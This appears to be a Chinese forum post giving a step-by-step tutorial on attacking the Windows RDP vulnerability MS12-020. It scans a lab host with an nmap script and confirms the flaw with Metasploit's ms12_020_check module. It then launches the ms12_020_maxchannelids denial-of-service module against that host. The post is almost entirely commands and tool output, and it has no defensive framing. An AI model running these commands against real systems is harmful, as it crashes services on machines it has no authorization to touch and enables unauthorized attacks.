|
|
先启动postgresql数据库
service postgresql start
利用nmap扫描漏洞
1. nmap
root@MiWiFi-R1CL-srv:~# cd /usr/share/nmap/scripts/
root@MiWiFi-R1CL-srv:/usr/share/nmap/scripts# ls |grep rdp
http-wordpress-brute.nse
http-wordpress-enum.nse
http-wordpress-users.nse
rdp-enum-encryption.nse
rdp-vuln-ms12-020.nse
2. nmap -vv --open -p 3389 --script=rdp-vuln-ms12-020 192.168.159.128
3. msfconsole
search ms12-020
(1) 漏洞检测
msf > use auxiliary/scanner/rdp/ms12_020_check
msf auxiliary(ms12_020_check) > set rhosts 192.168.159.128 设置远程ip
msf auxiliary(ms12_020_check) > show options 查看配置
Name Current Setting Required Description
---- --------------- -------- -----------
RHOSTS 192.168.159.128 yes The target address range or CIDR identifier
RPORT 3389 yes Remote port running RDP (TCP)
THREADS 1 yes The number of concurrent threads
msf auxiliary(ms12_020_check) > run
[+] 192.168.159.128:3389 - 192.168.159.128:3389 - The target is vulnerable. 漏洞存在
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
(2) 漏洞攻击
msf auxiliary(ms12_020_check) > use auxiliary/dos/windows/rdp/ms12_020_maxchannelids
msf auxiliary(ms12_020_maxchannelids) > set rhost 192.168.159.128 设置远程ip
rhost => 192.168.159.128
msf auxiliary(ms12_020_maxchannelids) > show options
msf auxiliary(ms12_020_maxchannelids) > run |
本帖子中包含更多资源
您需要 登录 才可以下载或查看,没有账号?注册
×
|
发表于 2018-4-15 11:45:34
